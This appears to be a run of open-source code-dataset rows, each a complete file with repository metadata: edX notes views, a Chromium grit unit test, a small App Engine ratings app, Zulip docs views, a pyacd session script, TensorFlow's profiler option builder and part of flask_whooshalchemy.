"updated": "Dec 09, 2015 at 09:31 UTC",
"tags": ["shadow","oil"],
"quote": "foo bar baz",
"section": {
"display_name": "edX Exams",
"location": "i4x://org/course/category/name@revision",
"children": [
"i4x://org/course/category/name@revision",
"i4x://org/course/category/name@revision",
]
},
"created": "2015-12-09T09:31:17.338305Z",
"ranges": [
{
"start": "/div[1]/p[1]",
"end": "/div[1]/p[1]",
"startOffset": 0,
"endOffset": 6
}
],
"user": "50cf92f9a3d8489df95e583549b919df",
"text": "first angry height hungry structure",
"course_id": "edx/DemoX/Demo",
"id": "1231",
"unit": {
"url": "/courses/edx%2FDemoX%2FDemo/courseware/1414ffd5143b4b508f739b563ab468b7/workflow/1",
"display_name": "EdX Exams",
"location": "i4x://org/course/category/name@revision"
},
"usage_id": "i4x://org/course/category/name@revision"
} ],
"next": "http://0.0.0.0:8000/courses/edx%2FDemoX%2FDemo/edxnotes/notes/?page=2&page_size=10",
"start": 0,
"previous": null
}
"""
course_key = CourseKey.from_string(course_id)
course = get_course_with_access(request.user, 'load', course_key)
if not is_feature_enabled(course):
raise Http404
page = request.GET.get('page') or DEFAULT_PAGE
page_size = request.GET.get('page_size') or DEFAULT_PAGE_SIZE
text = request.GET.get('text')
try:
notes_info = get_notes(
request,
course,
page=page,
page_size=page_size,
text=text
)
except (EdxNotesParseError, EdxNotesServiceUnavailable) as err:
return JsonResponseBadRequest({"error": err.message}, status=500)
return HttpResponse(json.dumps(notes_info, cls=NoteJSONEncoder), content_type="application/json")
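# Example request (added for illustration; the course id is a placeholder):
# GET /courses/org%2Fcourse%2Frun/edxnotes/notes/?page=2&page_size=10&text=foo
# returns the paginated JSON payload documented in the docstring above.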
# pylint: disable=unused-argument
@login_required
def get_token(request, course_id):
"""
Get JWT ID-Token, in case you need new one.
"""
return HttpResponse(get_edxnotes_id_token(request.user), content_type='text/plain')
@login_required
def edxnotes_visibility(request, course_id):
"""
Handle ajax call from "Show notes" checkbox.
"""
course_key = CourseKey.from_string(course_id)
course = get_course_with_access(request.user, "load", course_key)
field_data_cache = FieldDataCache([course], course_key, request.user)
course_module = get_module_for_descriptor(
request.user, request, course, field_data_cache, course_key, course=course
)
if not is_feature_enabled(course):
raise Http404
try:
visibility = json.loads(request.body)["visibility"]
course_module.edxnotes_visibility = visibility
course_module.save()
return JsonResponse(status=200)
except (ValueError, KeyError):
log.warning(
"Could not decode request body as JSON and find a boolean visibility field: '%s'", request.body
)
return JsonResponseBadRequest()
| agpl-3.0 | -1,188,266,086,755,511,000 | 31.626214 | 108 | 0.596637 | false |
endlessm/chromium-browser | tools/grit/grit/pseudo_unittest.py | 5 | 1861 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for grit.pseudo'''
from __future__ import print_function
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import unittest
from grit import pseudo
from grit import tclib
class PseudoUnittest(unittest.TestCase):
def testVowelMapping(self):
self.failUnless(pseudo.MapVowels('abebibobuby') ==
u'\u00e5b\u00e9b\u00efb\u00f4b\u00fcb\u00fd')
self.failUnless(pseudo.MapVowels('ABEBIBOBUBY') ==
u'\u00c5B\u00c9B\u00cfB\u00d4B\u00dcB\u00dd')
def testPseudoString(self):
out = pseudo.PseudoString('hello')
self.failUnless(out == pseudo.MapVowels(u'hePelloPo', True))
def testConsecutiveVowels(self):
out = pseudo.PseudoString("beautiful weather, ain't it?")
self.failUnless(out == pseudo.MapVowels(
u"beauPeautiPifuPul weaPeathePer, aiPain't iPit?", 1))
def testCapitals(self):
out = pseudo.PseudoString("HOWDIE DOODIE, DR. JONES")
self.failUnless(out == pseudo.MapVowels(
u"HOPOWDIEPIE DOOPOODIEPIE, DR. JOPONEPES", 1))
def testPseudoMessage(self):
msg = tclib.Message(text='Hello USERNAME, how are you?',
placeholders=[
tclib.Placeholder('USERNAME', '%s', 'Joi')])
trans = pseudo.PseudoMessage(msg)
# TODO(joi) It would be nicer if 'you' -> 'youPou' instead of
# 'you' -> 'youPyou' and if we handled the silent e in 'are'
self.failUnless(trans.GetPresentableContent() ==
pseudo.MapVowels(
u'HePelloPo USERNAME, hoPow aParePe youPyou?', 1))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 1,148,394,896,949,791,000 | 32.836364 | 72 | 0.653412 | false |
msavoury/machine-learning | apps/rateawatch/rateawatch.py | 1 | 2526 | import os
import webapp2
import jinja2
import webapp2
import json
from google.appengine.ext import ndb
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class UserRating(ndb.Model):
username = ndb.StringProperty()
ratings = ndb.JsonProperty()
class MainPage(webapp2.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'text/html'
template = JINJA_ENVIRONMENT.get_template('index.html')
template_value = { 'value': 8}
self.response.write(template.render(template_value))
class RatingPage(webapp2.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'text/html'
template = JINJA_ENVIRONMENT.get_template('index.html')
template_value = { 'value': 8}
self.response.write('dammit')
def post(self):
self.response.headers['Content-Type'] = 'text/html'
template = JINJA_ENVIRONMENT.get_template('index.html')
template_value = { 'value': 8}
json_data = json.loads(self.request.body)
json_data['stuff'] = "marcos"
self.response.write(json.dumps(json_data))
class APIPage(webapp2.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'application/json'
id = 6473924464345088
user = ndb.Key(UserRating, id).get()
name = user.username
self.response.write(json.dumps(name))
def post(self):
self.response.headers['Content-Type'] = 'application/json'
#TODO:// Make this more secure
json_data = json.loads(self.request.body)
user_rating = UserRating()
user_rating.username = json_data['username']
user_rating.ratings = json_data['ratings']
user_key = user_rating.put()
self.response.write('{"user_key":"' + str(user_key.id()) +'"}')
class RatingsPage(webapp2.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'application/json'
all_ratings = UserRating.query().fetch()
result = {}
result['stuff'] = [x.ratings for x in all_ratings]
self.response.write(json.dumps(result))
def delete(self):
ndb.delete_multi(UserRating.query().fetch(keys_only=True))
application = webapp2.WSGIApplication([
('/', MainPage),
('/api/rating', RatingPage),
('/api/test', APIPage),
('/api/ratings', RatingsPage),
], debug=True)
| mit | 307,169,230,011,078,660 | 31.805195 | 71 | 0.641726 | false |
AZtheAsian/zulip | zerver/views/integrations.py | 4 | 5338 | from __future__ import absolute_import
from typing import Optional, Any, Dict
from collections import OrderedDict
from django.views.generic import TemplateView
from django.conf import settings
from django.http import HttpRequest, HttpResponse, HttpResponseNotFound
import os
import ujson
from zerver.lib import bugdown
from zerver.lib.integrations import INTEGRATIONS, HUBOT_LOZENGES
from zerver.lib.utils import get_subdomain
from zproject.jinja2 import render_to_response
def add_api_uri_context(context, request):
# type: (Dict[str, Any], HttpRequest) -> None
if settings.REALMS_HAVE_SUBDOMAINS:
subdomain = get_subdomain(request)
if subdomain:
display_subdomain = subdomain
html_settings_links = True
else:
display_subdomain = 'yourZulipDomain'
html_settings_links = False
external_api_path_subdomain = '%s.%s' % (display_subdomain,
settings.EXTERNAL_API_PATH)
else:
external_api_path_subdomain = settings.EXTERNAL_API_PATH
html_settings_links = True
external_api_uri_subdomain = '%s%s' % (settings.EXTERNAL_URI_SCHEME,
external_api_path_subdomain)
context['external_api_path_subdomain'] = external_api_path_subdomain
context['external_api_uri_subdomain'] = external_api_uri_subdomain
context["html_settings_links"] = html_settings_links
class ApiURLView(TemplateView):
def get_context_data(self, **kwargs):
# type: (Optional[Dict[str, Any]]) -> Dict[str, str]
context = super(ApiURLView, self).get_context_data(**kwargs)
add_api_uri_context(context, self.request)
return context
class APIView(ApiURLView):
template_name = 'zerver/api.html'
class HelpView(ApiURLView):
template_name = 'zerver/help/main.html'
path_template = os.path.join(settings.DEPLOY_ROOT, 'templates/zerver/help/%s.md')
def get_path(self, article):
# type: (str) -> str
if article == "":
article = "index"
return self.path_template % (article,)
def get_context_data(self, **kwargs):
# type: (**Any) -> Dict[str, str]
article = kwargs["article"]
context = super(HelpView, self).get_context_data()
path = self.get_path(article)
if os.path.exists(path):
context["article"] = path
else:
context["article"] = self.get_path("missing")
return context
def get(self, request, article=""):
# type: (HttpRequest, str) -> HttpResponse
path = self.get_path(article)
result = super(HelpView, self).get(request, article=article)
if not os.path.exists(path):
# Ensure a 404 response code if no such document
result.status_code = 404
return result
class IntegrationView(ApiURLView):
template_name = 'zerver/integrations.html'
def get_context_data(self, **kwargs):
# type: (Optional[Dict[str, Any]]) -> Dict[str, Any]
context = super(IntegrationView, self).get_context_data(**kwargs) # type: Dict[str, Any]
alphabetical_sorted_integration = OrderedDict(sorted(INTEGRATIONS.items()))
alphabetical_sorted_hubot_lozenges = OrderedDict(sorted(HUBOT_LOZENGES.items()))
context['integrations_dict'] = alphabetical_sorted_integration
context['hubot_lozenges_dict'] = alphabetical_sorted_hubot_lozenges
if context["html_settings_links"]:
settings_html = '<a href="../#settings">Zulip settings page</a>'
subscriptions_html = '<a target="_blank" href="../#subscriptions">subscriptions page</a>'
else:
settings_html = 'Zulip settings page'
subscriptions_html = 'subscriptions page'
context['settings_html'] = settings_html
context['subscriptions_html'] = subscriptions_html
return context
def api_endpoint_docs(request):
# type: (HttpRequest) -> HttpResponse
context = {} # type: Dict[str, Any]
add_api_uri_context(context, request)
raw_calls = open('templates/zerver/api_content.json', 'r').read()
calls = ujson.loads(raw_calls)
langs = set()
for call in calls:
call["endpoint"] = "%s/v1/%s" % (context["external_api_uri_subdomain"],
call["endpoint"])
call["example_request"]["curl"] = call["example_request"]["curl"].replace("https://api.zulip.com",
context["external_api_uri_subdomain"])
response = call['example_response']
if '\n' not in response:
# For 1-line responses, pretty-print them
extended_response = response.replace(", ", ",\n ")
else:
extended_response = response
call['rendered_response'] = bugdown.convert("~~~ .py\n" + extended_response + "\n~~~\n", bugdown.DEFAULT_BUGDOWN_KEY)
for example_type in ('request', 'response'):
for lang in call.get('example_' + example_type, []):
langs.add(lang)
return render_to_response(
'zerver/api_endpoints.html', {
'content': calls,
'langs': langs,
},
request=request)
| apache-2.0 | 1,749,742,848,947,373,600 | 39.135338 | 125 | 0.611652 | false |
dppereyra/pyamazonclouddrive | bin/acdsession.py | 10 | 3367 | #!/usr/bin/env python
#
# Copyright (c) 2011 anatanokeitai.com(sakurai_youhei)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import os, sys, getpass
from optparse import OptionParser
try:
import pyacd
except ImportError:
pyacd_lib_dir=os.path.dirname(__file__)+os.sep+".."
if os.path.exists(pyacd_lib_dir) and os.path.isdir(pyacd_lib_dir):
sys.path.insert(0, pyacd_lib_dir)
import pyacd
parser=OptionParser(
epilog="This command updates/creates your session of Amazon Cloud Drive.",
usage="%prog -e youremail -p yourpassword -s path/to/sessionfile",
version=pyacd.__version__
)
parser.add_option(
"--domain",dest="domain",action="store",default="www.amazon.com",
help="domain of Amazon [default: %default]"
)
parser.add_option(
"-e",dest="email",action="store",default=None,
help="email address for Amazon"
)
parser.add_option(
"-p",dest="password",action="store",default=None,
help="password for Amazon"
)
parser.add_option(
"-s",dest="session",action="store",default=None,metavar="FILE",
help="save/load login session to/from FILE"
)
parser.add_option(
"-v",dest="verbose",action="store_true",default=False,
help="show verbose message"
)
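# Example invocation (illustrative; the e-mail address and session path are
# placeholders, not values shipped with this tool):
#
#   python acdsession.py -e you@example.com -s ~/.acd_session -v
#
# On success this logs into Amazon Cloud Drive and writes the refreshed session
# back to the file given with -s, creating it if it does not exist yet.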
def main():
opts,args=parser.parse_args(sys.argv[1:])
pyacd.set_amazon_domain(opts.domain)
for m in ["email","session"]:
if not opts.__dict__[m]:
print >>sys.stderr, "mandatory option is missing (%s)\n"%m
parser.print_help()
exit(2)
if not opts.password:
opts.password = getpass.getpass()
if os.path.isdir(opts.session):
print >>sys.stderr, "%s should not be directory."%s
exit(2)
if opts.verbose:
print >>sys.stderr, "Loading previous session...",
try:
s=pyacd.Session.load_from_file(opts.session)
if opts.verbose:
print >>sys.stderr, "Done."
except:
s=pyacd.Session()
if opts.verbose:
print >>sys.stderr, "Failed."
if opts.verbose:
print >>sys.stderr, "Logging into %s..."%opts.domain,
try:
session=pyacd.login(opts.email,opts.password,session=s)
if opts.verbose:
print >>sys.stderr, "Done."
if opts.verbose:
print >>sys.stderr, "Updating current session...",
session.save_to_file(opts.session)
if opts.verbose:
print >>sys.stderr, "Done."
except:
if opts.verbose:
print >>sys.stderr, "Failed."
if __name__=="__main__":
main()
| mit | 9,216,724,403,935,162,000 | 29.889908 | 76 | 0.696763 | false |
gautam1858/tensorflow | tensorflow/python/profiler/option_builder.py | 13 | 16616 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for building profiler options."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from tensorflow.python.profiler import tfprof_logger
from tensorflow.python.util.tf_export import tf_export
@tf_export(v1=['profiler.ProfileOptionBuilder'])
class ProfileOptionBuilder(object):
# pylint: disable=line-too-long
"""Option Builder for Profiling API.
For tutorial on the options, see
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/g3doc/options.md
```python
# Users can use pre-built options:
opts = (
tf.profiler.ProfileOptionBuilder.trainable_variables_parameter())
# Or, build your own options:
opts = (tf.profiler.ProfileOptionBuilder()
.with_max_depth(10)
.with_min_micros(1000)
.select(['accelerator_micros'])
.with_stdout_output()
.build()
# Or customize the pre-built options:
opts = (tf.profiler.ProfileOptionBuilder(
tf.profiler.ProfileOptionBuilder.time_and_memory())
.with_displaying_options(show_name_regexes=['.*rnn.*'])
.build())
# Finally, profiling with the options:
_ = tf.profiler.profile(tf.get_default_graph(),
run_meta=run_meta,
cmd='scope',
options=opts)
```
"""
# pylint: enable=line-too-long
def __init__(self, options=None):
"""Constructor.
Args:
options: Optional initial option dict to start with.
"""
if options is not None:
self._options = copy.deepcopy(options)
else:
self._options = {'max_depth': 100,
'min_bytes': 0,
'min_micros': 0,
'min_params': 0,
'min_float_ops': 0,
'min_occurrence': 0,
'order_by': 'name',
'account_type_regexes': ['.*'],
'start_name_regexes': ['.*'],
'trim_name_regexes': [],
'show_name_regexes': ['.*'],
'hide_name_regexes': [],
'account_displayed_op_only': False,
'select': ['micros'],
'step': -1,
'output': 'stdout'}
@staticmethod
def trainable_variables_parameter():
"""Options used to profile trainable variable parameters.
Normally used together with 'scope' view.
Returns:
A dict of profiling options.
"""
return {'max_depth': 10000,
'min_bytes': 0,
'min_micros': 0,
'min_params': 0,
'min_float_ops': 0,
'min_occurrence': 0,
'order_by': 'name',
'account_type_regexes': [tfprof_logger.TRAINABLE_VARIABLES],
'start_name_regexes': ['.*'],
'trim_name_regexes': [],
'show_name_regexes': ['.*'],
'hide_name_regexes': [],
'account_displayed_op_only': True,
'select': ['params'],
'step': -1,
'output': 'stdout'}
@staticmethod
def float_operation():
# pylint: disable=line-too-long
"""Options used to profile float operations.
Please see https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/g3doc/profile_model_architecture.md
on the caveats of calculating float operations.
Returns:
A dict of profiling options.
"""
# pylint: enable=line-too-long
return {'max_depth': 10000,
'min_bytes': 0,
'min_micros': 0,
'min_params': 0,
'min_float_ops': 1,
'min_occurrence': 0,
'order_by': 'float_ops',
'account_type_regexes': ['.*'],
'start_name_regexes': ['.*'],
'trim_name_regexes': [],
'show_name_regexes': ['.*'],
'hide_name_regexes': [],
'account_displayed_op_only': True,
'select': ['float_ops'],
'step': -1,
'output': 'stdout'}
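# Hedged usage sketch for the options above (``graph`` is assumed to be the
# caller's own graph; it is not defined in this module):
#
#   opts = ProfileOptionBuilder.float_operation()
#   flops = tf.profiler.profile(graph, options=opts)
#   print('total float ops:', flops.total_float_ops)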
@staticmethod
def time_and_memory(min_micros=1, min_bytes=1, min_accelerator_micros=0,
min_cpu_micros=0, min_peak_bytes=0, min_residual_bytes=0,
min_output_bytes=0):
"""Show operation time and memory consumptions.
Args:
min_micros: Only show profiler nodes with execution time
no less than this. It sums accelerator and cpu times.
min_bytes: Only show profiler nodes requested to allocate no less bytes
than this.
min_accelerator_micros: Only show profiler nodes spend no less than
this time on accelerator (e.g. GPU).
min_cpu_micros: Only show profiler nodes spend no less than
this time on cpu.
min_peak_bytes: Only show profiler nodes using no less than this many bytes
at peak (high watermark). For profiler nodes consisting of multiple
graph nodes, it sums the graph nodes' peak_bytes.
min_residual_bytes: Only show profiler nodes that have no less than
this many bytes not being de-allocated after Compute() ends. For
profiler nodes consisting of multiple graph nodes, it sums the
graph nodes' residual_bytes.
min_output_bytes: Only show profiler nodes that output no less than this many
bytes. The output is not necessarily allocated by these profiler
nodes.
Returns:
A dict of profiling options.
"""
return {'max_depth': 10000,
'min_bytes': min_bytes,
'min_peak_bytes': min_peak_bytes,
'min_residual_bytes': min_residual_bytes,
'min_output_bytes': min_output_bytes,
'min_micros': min_micros,
'min_accelerator_micros': min_accelerator_micros,
'min_cpu_micros': min_cpu_micros,
'min_params': 0,
'min_float_ops': 0,
'min_occurrence': 0,
'order_by': 'micros',
'account_type_regexes': ['.*'],
'start_name_regexes': ['.*'],
'trim_name_regexes': [],
'show_name_regexes': ['.*'],
'hide_name_regexes': [],
'account_displayed_op_only': True,
'select': ['micros', 'bytes'],
'step': -1,
'output': 'stdout'}
def build(self):
"""Build a profiling option.
Returns:
A dict of profiling options.
"""
return copy.deepcopy(self._options)
def with_max_depth(self, max_depth):
"""Set the maximum depth of display.
The depth depends on profiling view. For 'scope' view, it's the
depth of name scope hierarchy (tree), for 'op' view, it's the number
of operation types (list), etc.
Args:
max_depth: Maximum depth of the data structure to display.
Returns:
self
"""
self._options['max_depth'] = max_depth
return self
def with_min_memory(self,
min_bytes=0,
min_peak_bytes=0,
min_residual_bytes=0,
min_output_bytes=0):
"""Only show profiler nodes consuming no less than 'min_bytes'.
Args:
min_bytes: Only show profiler nodes requested to allocate no less bytes
than this.
min_peak_bytes: Only show profiler nodes using no less than this many bytes
at peak (high watermark). For profiler nodes consisting of multiple
graph nodes, it sums the graph nodes' peak_bytes.
min_residual_bytes: Only show profiler nodes that have no less than
this many bytes not being de-allocated after Compute() ends. For
profiler nodes consisting of multiple graph nodes, it sums the
graph nodes' residual_bytes.
min_output_bytes: Only show profiler nodes that output no less than this many
bytes. The output is not necessarily allocated by these profiler
nodes.
Returns:
self
"""
self._options['min_bytes'] = min_bytes
self._options['min_peak_bytes'] = min_peak_bytes
self._options['min_residual_bytes'] = min_residual_bytes
self._options['min_output_bytes'] = min_output_bytes
return self
def with_min_execution_time(self,
min_micros=0,
min_accelerator_micros=0,
min_cpu_micros=0):
"""Only show profiler nodes consuming no less than 'min_micros'.
Args:
min_micros: Only show profiler nodes with execution time
no less than this. It sums accelerator and cpu times.
min_accelerator_micros: Only show profiler nodes spend no less than
this time on accelerator (e.g. GPU).
min_cpu_micros: Only show profiler nodes spend no less than
this time on cpu.
Returns:
self
"""
self._options['min_micros'] = min_micros
self._options['min_accelerator_micros'] = min_accelerator_micros
self._options['min_cpu_micros'] = min_cpu_micros
return self
def with_min_parameters(self, min_params):
"""Only show profiler nodes holding no less than 'min_params' parameters.
'Parameters' normally refers the weights of in TensorFlow variables.
It reflects the 'capacity' of models.
Args:
min_params: Only show profiler nodes holding number parameters
no less than this.
Returns:
self
"""
self._options['min_params'] = min_params
return self
def with_min_occurrence(self, min_occurrence):
# pylint: disable=line-too-long
"""Only show profiler nodes including no less than 'min_occurrence' graph nodes.
A "node" means a profiler output node, which can be a python line
(code view), an operation type (op view), or a graph node
(graph/scope view). A python line includes all graph nodes created by that
line, while an operation type includes all graph nodes of that type.
Args:
min_occurrence: Only show nodes including no less than this.
Returns:
self
"""
# pylint: enable=line-too-long
self._options['min_occurrence'] = min_occurrence
return self
def with_min_float_operations(self, min_float_ops):
# pylint: disable=line-too-long
"""Only show profiler nodes consuming no less than 'min_float_ops'.
Please see https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/g3doc/profile_model_architecture.md
on the caveats of calculating float operations.
Args:
min_float_ops: Only show profiler nodes with float operations
no less than this.
Returns:
self
"""
# pylint: enable=line-too-long
self._options['min_float_ops'] = min_float_ops
return self
def with_accounted_types(self, account_type_regexes):
"""Selectively counting statistics based on node types.
Here, 'types' means the profiler nodes' properties. Profiler by default
considers device name (e.g. /job:xx/.../device:GPU:0) and operation type
(e.g. MatMul) as profiler nodes' properties. User can also associate
customized 'types' to profiler nodes through OpLogProto proto.
For example, user can select profiler nodes placed on gpu:0 with:
`account_type_regexes=['.*gpu:0.*']`
If none of a node's properties match the specified regexes, the node is
not displayed nor accounted.
Args:
account_type_regexes: A list of regexes specifying the types.
Returns:
self.
"""
self._options['account_type_regexes'] = copy.copy(account_type_regexes)
return self
def with_node_names(self,
start_name_regexes=None,
show_name_regexes=None,
hide_name_regexes=None,
trim_name_regexes=None):
"""Regular expressions used to select profiler nodes to display.
After 'with_accounted_types' is evaluated, 'with_node_names' is
evaluated as follows:
For a profile data structure, profiler first finds the profiler
nodes matching 'start_name_regexes', and starts displaying profiler
nodes from there. Then, if a node matches 'show_name_regexes' and
doesn't match 'hide_name_regexes', it's displayed. If a node matches
'trim_name_regexes', profiler stops further searching that branch.
Args:
start_name_regexes: list of node name regexes to start displaying.
show_name_regexes: list of node names regexes to display.
hide_name_regexes: list of node_names regexes that should be hidden.
trim_name_regexes: list of node name regexes from where to stop.
Returns:
self
"""
if start_name_regexes is not None:
self._options['start_name_regexes'] = copy.copy(start_name_regexes)
if show_name_regexes is not None:
self._options['show_name_regexes'] = copy.copy(show_name_regexes)
if hide_name_regexes is not None:
self._options['hide_name_regexes'] = copy.copy(hide_name_regexes)
if trim_name_regexes is not None:
self._options['trim_name_regexes'] = copy.copy(trim_name_regexes)
return self
def account_displayed_op_only(self, is_true):
"""Whether only account the statistics of displayed profiler nodes.
Args:
is_true: If true, only account statistics of nodes eventually
displayed by the outputs.
Otherwise, a node's statistics are accounted by its parents
as long as it's types match 'account_type_regexes', even if
it is hidden from the output, say, by hide_name_regexes.
Returns:
self
"""
self._options['account_displayed_op_only'] = is_true
return self
def with_empty_output(self):
"""Do not generate side-effect outputs."""
self._options['output'] = 'none'
return self
def with_stdout_output(self):
"""Print the result to stdout."""
self._options['output'] = 'stdout'
return self
def with_file_output(self, outfile):
"""Print the result to a file."""
self._options['output'] = 'file:outfile=%s' % outfile
return self
def with_timeline_output(self, timeline_file):
"""Generate a timeline json file."""
self._options['output'] = 'timeline:outfile=%s' % timeline_file
return self
def with_pprof_output(self, pprof_file):
"""Generate a pprof profile gzip file.
To use the pprof file:
pprof -png --nodecount=100 --sample_index=1 <pprof_file>
Args:
pprof_file: filename for output, usually suffixed with .pb.gz.
Returns:
self.
"""
self._options['output'] = 'pprof:outfile=%s' % pprof_file
return self
def order_by(self, attribute):
# pylint: disable=line-too-long
"""Order the displayed profiler nodes based on a attribute.
Supported attribute includes micros, bytes, occurrence, params, etc.
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/g3doc/options.md
Args:
attribute: An attribute the profiler node has.
Returns:
self
"""
# pylint: enable=line-too-long
self._options['order_by'] = attribute
return self
def select(self, attributes):
# pylint: disable=line-too-long
"""Select the attributes to display.
See https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/g3doc/options.md
for supported attributes.
Args:
attributes: A list of attribute the profiler node has.
Returns:
self
"""
# pylint: enable=line-too-long
self._options['select'] = copy.copy(attributes)
return self
def with_step(self, step):
"""Which profile step to use for profiling.
The 'step' here refers to the step defined by `Profiler.add_step()` API.
Args:
step: When multiple steps of profiles are available, select which step's
profile to use. If -1, use average of all available steps.
Returns:
self
"""
self._options['step'] = step
return self
| apache-2.0 | -4,446,657,029,276,592,600 | 34.733333 | 128 | 0.618861 | false |
xkcd1253/Mimi | flask/lib/python2.7/site-packages/flask_whooshalchemy.py | 5 | 9043 | '''
whooshalchemy flask extension
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Adds whoosh indexing capabilities to SQLAlchemy models for Flask
applications.
:copyright: (c) 2012 by Karl Gyllstrom
:license: BSD (see LICENSE.txt)
'''
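# A minimal usage sketch (illustrative only; the ``BlogPost`` model, the ``db``
# handle and the ``app`` object are hypothetical and not part of this module):
# mark the text columns to index with ``__searchable__`` and the extension
# keeps the per-model Whoosh index in sync on commit.
#
#   import flask_whooshalchemy as whooshalchemy
#
#   class BlogPost(db.Model):
#       __tablename__ = 'blogpost'
#       __searchable__ = ['title', 'content']  # indexed text columns
#       id = db.Column(db.Integer, primary_key=True)
#       title = db.Column(db.Unicode)
#       content = db.Column(db.Text)
#
#   whooshalchemy.whoosh_index(app, BlogPost)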
from __future__ import with_statement
from __future__ import absolute_import
from flask.ext.sqlalchemy import models_committed
import sqlalchemy
from whoosh.qparser import OrGroup
from whoosh.qparser import AndGroup
from whoosh.qparser import MultifieldParser
from whoosh.analysis import StemmingAnalyzer
import whoosh.index
from whoosh.fields import Schema
#from whoosh.fields import ID, TEXT, KEYWORD, STORED
import heapq
import os
__searchable__ = '__searchable__'
DEFAULT_WHOOSH_INDEX_NAME = 'whoosh_index'
class _QueryProxy(sqlalchemy.orm.Query):
# We're replacing the model's ``query`` field with this proxy. The main
# thing this proxy does is override the __iter__ method so that results are
# returned in the order of the whoosh score to reflect text-based ranking.
def __init__(self, query_obj, primary_key_name, whoosh_searcher, model):
# Make this a pure copy of the original Query object.
self.__dict__ = query_obj.__dict__.copy()
self._primary_key_name = primary_key_name
self._whoosh_searcher = whoosh_searcher
self._modelclass = model
# Stores whoosh results from query. If ``None``, indicates that no
# whoosh query was performed.
self._whoosh_rank = None
def __iter__(self):
''' Reorder ORM-db results according to Whoosh relevance score. '''
super_iter = super(_QueryProxy, self).__iter__()
if self._whoosh_rank is None:
# Whoosh search hasn't been run so behave as normal.
return super_iter
# Iterate through the values and re-order by whoosh relevance.
ordered_by_whoosh_rank = []
for row in super_iter:
# Push items onto heap, where sort value is the rank provided by
# Whoosh
heapq.heappush(ordered_by_whoosh_rank,
(self._whoosh_rank[unicode(getattr(row,
self._primary_key_name))], row))
def _inner():
while ordered_by_whoosh_rank:
yield heapq.heappop(ordered_by_whoosh_rank)[1]
return _inner()
def whoosh_search(self, query, limit=None, fields=None, or_=False):
'''
Execute text query on database. Results have a text-based
match to the query, ranked by the scores from the underlying Whoosh
index.
By default, the search is executed on all of the indexed fields as an
OR conjunction. For example, if a model has 'title' and 'content'
indicated as ``__searchable__``, a query will be checked against both
fields, returning any instance whose title or content are a content
match for the query. To specify particular fields to be checked,
populate the ``fields`` parameter with the desired fields.
By default, results will only be returned if they contain all of the
query terms (AND). To switch to an OR grouping, set the ``or_``
parameter to ``True``.
'''
if not isinstance(query, unicode):
query = unicode(query)
results = self._whoosh_searcher(query, limit, fields, or_)
if not results:
# We don't want to proceed with empty results because we get a
# stderr warning from sqlalchemy when executing 'in_' on empty set.
# However we cannot just return an empty list because it will not
# be a query.
# XXX is this efficient?
return self.filter('null')
result_set = set()
result_ranks = {}
for rank, result in enumerate(results):
pk = result[self._primary_key_name]
result_set.add(pk)
result_ranks[pk] = rank
f = self.filter(getattr(self._modelclass,
self._primary_key_name).in_(result_set))
f._whoosh_rank = result_ranks
return f
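# Illustrative call patterns for the proxy above (``BlogPost`` is a
# hypothetical indexed model, not something defined in this module):
#
#   BlogPost.query.whoosh_search(u'whoosh')                  # AND over all fields
#   BlogPost.query.whoosh_search(u'flask whoosh', or_=True)  # OR grouping
#   BlogPost.query.whoosh_search(u'flask', fields=['title'], limit=5)
#
# The result is still a SQLAlchemy query object, so further filtering can
# typically be chained before iterating in Whoosh relevance order.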
class _Searcher(object):
''' Assigned to a Model class as ``pure_search``, which enables
text-querying to whoosh hit list. Also used by ``query.whoosh_search``'''
def __init__(self, primary, indx):
self.primary_key_name = primary
self._index = indx
self.searcher = indx.searcher()
self._all_fields = list(set(indx.schema._fields.keys()) -
set([self.primary_key_name]))
def __call__(self, query, limit=None, fields=None, or_=False):
if fields is None:
fields = self._all_fields
group = OrGroup if or_ else AndGroup
parser = MultifieldParser(fields, self._index.schema, group=group)
return self._index.searcher().search(parser.parse(query),
limit=limit)
def whoosh_index(app, model):
''' Create whoosh index for ``model``, if one does not exist. If
the index exists it is opened and cached. '''
